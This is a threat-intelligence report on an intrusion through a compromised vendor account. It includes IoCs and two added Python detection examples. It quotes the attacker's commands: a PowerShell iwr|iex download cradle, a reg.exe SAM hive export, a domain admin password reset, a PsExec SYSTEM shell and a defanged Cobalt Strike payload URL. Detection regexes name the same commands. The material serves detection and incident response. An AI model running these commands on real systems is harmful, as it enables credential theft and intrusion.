Ransomware Precursor Activity Traced to Compromised Vendor Account

eSentire’s TRU investigated a host accessed via a compromised IT services vendor account where the attacker performed domain reconnaissance, attempted credential dumping, installed Level.io RMM, and ultimately deployed Cobalt Strike payloads. The activity included tool transfers and privilege escalation attempts consistent with known criminal TTPs and a possible Scattered Spider association. #CobaltStrike #ScatteredSpider

Key points

  • Compromised vendor account used to initiate an RDP session to a customer host outside monitoring scope, enabling follow-on activity.
  • Attacker attempted to install Level.io RMM via a direct executable and a PowerShell one-liner that fetched install_windows.ps1 using iwr | iex.
  • Reconnaissance commands were executed to enumerate local and domain users and groups (net user, net user /domain, net localgroup Administrators /domain, net localgroup "Domain Admins" /domain).
  • A network discovery binary netscan.exe (MD5: 52746d457f8ec149fd13dea85b654b19) was dropped via RDP and terminated by an endpoint agent.
  • Credential-dumping activity was attempted (taskmgr usage and reg.exe save hklm\sam), but no SYSTEM hive was collected, suggesting SAM extraction likely failed.
  • Cobalt Strike payloads were retrieved from hxxps://temp[.]sh/VWXth/cob[.]zip and executed (payload64.exe MD5: 155560e1e4ea8fcce047514a52950859); the archive contained additional fallback payloads pointing to the same C2.
  • Privilege escalation attempts included resetting the Administrator password and launching a SYSTEM shell via PsExec (‘.\PsExec.exe -i -s cmd.exe’).

MITRE Techniques

  • [T1078] Valid Accounts – Use of a compromised vendor account to access the host via RDP (‘RDP session initiated by a compromised IT services vendor account’).
  • [T1021.001] Remote Services: Remote Desktop Protocol – Actor accessed the system through RDP to perform follow-on actions (‘RDP session initiated by a compromised IT services vendor account’).
  • [T1059.001] Command and Scripting Interpreter: PowerShell – Installer fetched and executed via PowerShell one-liner using Invoke-WebRequest piped to Invoke-Expression (‘iwr -useb hxxps://downloads.level[.]io/install_windows.ps1 | iex’).
  • [T1105] Ingress Tool Transfer – Network discovery and payload binaries were transferred to the host via the RDP session (‘C:\ProgramData\netscan\netscan\netscan.exe (MD5: 52746d457f8ec149fd13dea85b654b19)’).
  • [T1003.002] OS Credential Dumping: SAM – Attempt to export the SAM hive using reg.exe (‘reg.exe save hklm\sam C:/Programdata/sam.save’).
  • [T1219] Remote Management Software – Attempts to install the Level RMM agent to maintain control of the host (PowerShell install command and direct executable install: ‘C:\Windows\Temp\level-windows-amd64.exe /k /a install’).
  • [T1059.003] Command and Scripting Interpreter: Windows Command Shell – Use of PsExec to spawn a SYSTEM-level command shell (‘.\PsExec.exe -i -s cmd.exe’).

Indicators of Compromise

  • [File name] dropped/tools – netscan.exe (dropped at C:\ProgramData\netscan\netscan.exe), payload64.exe (executed Cobalt Strike payload)
  • [File hash, MD5] observed binaries – 52746d457f8ec149fd13dea85b654b19 (netscan.exe), 155560e1e4ea8fcce047514a52950859 (payload64.exe), 192644d5f4fc2313bca0224210c0b6c7 (cob.zip)
  • [URL / Domain] payload/tool sources – hxxps://temp[.]sh/VWXth/cob[.]zip (Cobalt Strike archive), hxxps://downloads.level[.]io/install_windows.ps1 (Level.io installer script)
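The indicators above are published defanged (hxxps://, [.]), so they cannot be compared against telemetry as written. The following is an added example, not code from eSentire or the report, that refangs the three hashes and two URLs from this list, normalises them, and sweeps a handful of constructed file-creation and HTTP records for exact hash and URL hits, with a weaker host-level hit reported separately. Host names, the telemetry schema and the benign records are assumptions made for the example; the indicators themselves are the ones listed on this page.

```python
import re

# Indicators exactly as published above (defanged). Labels are the report's descriptions.
RAW_IOCS = {
    "md5": {
        "52746d457f8ec149fd13dea85b654b19": "netscan.exe",
        "155560e1e4ea8fcce047514a52950859": "payload64.exe",
        "192644d5f4fc2313bca0224210c0b6c7": "cob.zip",
    },
    "url": {
        "hxxps://temp[.]sh/VWXth/cob[.]zip": "Cobalt Strike archive",
        "hxxps://downloads.level[.]io/install_windows.ps1": "Level.io installer script",
    },
}


def refang(indicator: str) -> str:
    """Undo the usual defanging conventions: hxxp(s):// -> http(s)://, [.] -> ., [:] -> :."""
    s = indicator.strip()
    s = re.sub(r"^hxxp(s?)://", r"http\1://", s, flags=re.IGNORECASE)
    return s.replace("[.]", ".").replace("(.)", ".").replace("[:]", ":")


def normalize_url(url: str) -> str:
    """Lower-case scheme and host only; URL paths are case-sensitive (VWXth must stay as-is)."""
    m = re.match(r"^([a-z]+)://([^/]+)(.*)$", url, flags=re.IGNORECASE)
    if not m:
        return url
    scheme, host, rest = m.groups()
    return f"{scheme.lower()}://{host.lower()}{rest}"


def host_of(url: str) -> str:
    """Host part of a URL, lower-cased, without a port."""
    m = re.match(r"^[a-z]+://([^/]+)", url, flags=re.IGNORECASE)
    return m.group(1).lower().split(":")[0] if m else ""


def build_index(raw=RAW_IOCS):
    """Refang and normalise the published indicators into lookup tables."""
    md5s = {h.lower(): label for h, label in raw["md5"].items()}
    urls, hosts = {}, {}
    for u, label in raw["url"].items():
        clean = normalize_url(refang(u))
        urls[clean] = label
        hosts.setdefault(host_of(clean), label)  # host-level fallback, lower confidence
    return md5s, urls, hosts


# Constructed telemetry (not from the report): EDR file events and proxy URL events.
SAMPLE_TELEMETRY = [
    {"host": "WS01", "kind": "file", "path": r"C:\ProgramData\netscan\netscan.exe",
     "md5": "52746D457F8EC149FD13DEA85B654B19"},  # upper-case, as some agents emit
    {"host": "WS01", "kind": "http", "url": "https://temp.sh/VWXth/cob.zip"},
    {"host": "WS02", "kind": "http", "url": "https://downloads.level.io/install_windows.ps1"},
    {"host": "WS04", "kind": "http", "url": "https://temp.sh/other/file.zip"},
    {"host": "WS03", "kind": "file", "path": r"C:\Windows\System32\calc.exe",
     "md5": "d41d8cd98f00b204e9800998ecf8427e"},  # benign placeholder hash (MD5 of empty input)
    {"host": "WS03", "kind": "http", "url": "https://example.com/index.html"},
]


def match_telemetry(events, raw=RAW_IOCS):
    """Return (host, match_kind, indicator, label) for every record that hits an IoC."""
    md5s, urls, hosts = build_index(raw)
    matches = []
    for ev in events:
        if ev["kind"] == "file":
            label = md5s.get(ev["md5"].lower())
            if label:
                matches.append((ev["host"], "md5", ev["md5"].lower(), label))
        elif ev["kind"] == "http":
            u = normalize_url(ev["url"])
            if u in urls:
                matches.append((ev["host"], "url", u, urls[u]))
            elif host_of(u) in hosts:
                # Same host, different path: worth a look, but the report only names the full URL.
                matches.append((ev["host"], "url_host", host_of(u), hosts[host_of(u)]))
    return matches


if __name__ == "__main__":
    for m in match_telemetry(SAMPLE_TELEMETRY):
        print(m)
```

Note that downloads.level.io is the legitimate download host of a commercial RMM product; the report's point is that the attacker installed it, not that the domain is malicious, so a host-level hit there should be treated as a prompt to check who ran the installer rather than as a verdict. The temp.sh host-level match is similarly only a lead, which is why the example reports it under a separate `url_host` kind.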

In February 2024 a vendor account was used to RDP into a customer host and execute a sequence of preparatory and offensive actions. The attacker ran numerous reconnaissance commands (net user, net user /domain, net localgroup Administrators /domain, net localgroup "Domain Admins" /domain) to map accounts and privileges, dropped a netscan binary (MD5: 52746d45…) to perform network discovery, and attempted to install Level.io agents both via a direct executable invocation and a PowerShell installer fetched with Invoke-WebRequest and piped to Invoke-Expression. Endpoint controls terminated the network scanner, but the actor persisted with further actions.

Credential access attempts were observed: the actor opened Task Manager (taskmgr.exe /4), attempted to export the SAM registry hive with reg.exe save hklm\sam C:/Programdata/sam.save, and tried to reset the Administrator password (net user administrator 123!@#qweQWE /domain); the absence of a SYSTEM hive retrieval suggests SAM decryption was likely unsuccessful. Lateral/privilege escalation efforts included using PsExec to spawn a SYSTEM shell (‘.\PsExec.exe -i -s cmd.exe’).

For persistence and command-and-control, the actor retrieved a Cobalt Strike archive from hxxps://temp[.]sh/VWXth/cob[.]zip (MD5: 192644d5…) containing payload64.exe (MD5: 155560e1…) plus additional fallback payloads that all pointed to the same C2, and executed the primary payload. Command prompt hygiene was maintained by frequent ‘cls’ invocations to clear history and output.
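Every stage in the narrative above, and in the Key points and MITRE lists, was carried out with a command line a process-creation log would record. The following is an added example, not code from eSentire or the report, that turns those quoted commands into detection rules (PowerShell download cradle, Level installer, netscan.exe, reg.exe SAM export, net.exe domain enumeration, net.exe password reset with /domain, PsExec -s) and runs them over constructed Sysmon-style events, then scores each host by how many distinct techniques fired, since it is the chain rather than any single command that marks ransomware precursor activity. Host names, the vendor account name, timestamps, the placeholder password and the T1087.002/T1098 mappings for the enumeration and password reset (which the report does not assign IDs to) are assumptions made for the example; the other technique IDs are the report's.

```python
import re
from collections import defaultdict

# (rule name, MITRE technique, regex over the process command line).
# T1087.002 and T1098 are mappings added here; the rest are taken from the report above.
RULES = [
    ("PowerShell download cradle (iwr | iex)", "T1059.001",
     re.compile(r"(?:\biwr\b|invoke-webrequest).*\|\s*(?:\biex\b|invoke-expression)", re.I)),
    ("Level RMM agent install", "T1219",
     re.compile(r"level-windows-amd64\.exe\s+/k\s+/a\s+install|install_windows\.ps1", re.I)),
    ("netscan.exe network scanner executed", "T1105",
     re.compile(r"\bnetscan\.exe\b", re.I)),
    ("SAM hive export via reg.exe", "T1003.002",
     re.compile(r"\breg(?:\.exe)?\s+save\s+(?:hklm|hkey_local_machine)\\sam\b", re.I)),
    ("Domain user/group enumeration via net.exe", "T1087.002",
     # net user /domain, net localgroup Administrators /domain, net localgroup "Domain Admins" /domain
     re.compile(r'\bnet1?(?:\.exe)?\s+(?:user|group|localgroup)(?:\s+"[^"]*"|\s+[^\s/"]+)?\s+/domain\b', re.I)),
    ("Domain account password reset via net.exe", "T1098",
     # net user <account> <password> /domain: two arguments before the switch
     re.compile(r"\bnet1?(?:\.exe)?\s+user\s+\S+\s+\S+\s+/domain\b", re.I)),
    ("PsExec SYSTEM shell (-s)", "T1059.003",
     re.compile(r"\bpsexec(?:64)?(?:\.exe)?\b.*\s-s\b", re.I)),
]

# Constructed process-creation records (Sysmon event 1 / 4688 style). Hosts, the vendor
# account, timestamps and the placeholder password are made up; the command lines are the
# ones the report quotes, with defanged URLs restored. WS02 carries benign activity.
SAMPLE_EVENTS = [
    {"host": "WS01", "user": "CORP\\vendor-svc", "time": "2024-02-10T03:12:01Z",
     "cmdline": "net user /domain"},
    {"host": "WS01", "user": "CORP\\vendor-svc", "time": "2024-02-10T03:12:40Z",
     "cmdline": 'net localgroup "Domain Admins" /domain'},
    {"host": "WS01", "user": "CORP\\vendor-svc", "time": "2024-02-10T03:15:05Z",
     "cmdline": 'powershell.exe -c "iwr -useb https://downloads.level.io/install_windows.ps1 | iex"'},
    {"host": "WS01", "user": "CORP\\vendor-svc", "time": "2024-02-10T03:16:30Z",
     "cmdline": r"C:\Windows\Temp\level-windows-amd64.exe /k /a install"},
    {"host": "WS01", "user": "CORP\\vendor-svc", "time": "2024-02-10T03:20:11Z",
     "cmdline": r"C:\ProgramData\netscan\netscan.exe"},
    {"host": "WS01", "user": "CORP\\vendor-svc", "time": "2024-02-10T03:25:47Z",
     "cmdline": r"reg.exe save hklm\sam C:/Programdata/sam.save"},
    {"host": "WS01", "user": "CORP\\vendor-svc", "time": "2024-02-10T03:27:02Z",
     "cmdline": "net user administrator Passw0rd-placeholder /domain"},
    {"host": "WS01", "user": "CORP\\vendor-svc", "time": "2024-02-10T03:30:19Z",
     "cmdline": r".\PsExec.exe -i -s cmd.exe"},
    {"host": "WS02", "user": "CORP\\jdoe", "time": "2024-02-10T09:01:00Z",
     "cmdline": 'powershell.exe -c "Get-Process"'},
    {"host": "WS02", "user": "CORP\\jdoe", "time": "2024-02-10T09:02:00Z",
     "cmdline": "net user"},
]


def detect(events):
    """Apply every rule to every event; one hit per (event, rule) pair."""
    hits = []
    for ev in events:
        for name, technique, rx in RULES:
            if rx.search(ev["cmdline"]):
                hits.append({"host": ev["host"], "user": ev["user"], "time": ev["time"],
                             "rule": name, "technique": technique, "cmdline": ev["cmdline"]})
    return hits


def summarize_by_host(hits):
    """Distinct techniques and accounts seen per host."""
    techniques, users = defaultdict(set), defaultdict(set)
    for h in hits:
        techniques[h["host"]].add(h["technique"])
        users[h["host"]].add(h["user"])
    return {host: {"techniques": sorted(techniques[host]), "users": sorted(users[host])}
            for host in techniques}


def triage(events, min_distinct=3):
    """Flag hosts where at least min_distinct different techniques fired (chain, not single hit)."""
    hits = detect(events)
    summary = summarize_by_host(hits)
    flagged = sorted(h for h, s in summary.items() if len(s["techniques"]) >= min_distinct)
    return hits, summary, flagged


if __name__ == "__main__":
    hits, summary, flagged = triage(SAMPLE_EVENTS)
    for h in hits:
        print(h["time"], h["host"], h["technique"], h["rule"])
    print("flagged:", flagged, summary)
```

The enumeration rule deliberately requires /domain so that an administrator's plain `net user` on WS02 does not fire, and the password-reset rule requires two arguments before the switch so that `net user /domain` is classed as discovery rather than account manipulation. The `cls` invocations the report mentions are cmd.exe built-ins and never appear as process-creation events, so they are not covered here; they would have to come from console history or command-line auditing of the parent shell.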

Read more: https://www.esentire.com/blog/ransomware-precursor-activity-traced-to-compromised-vendor-account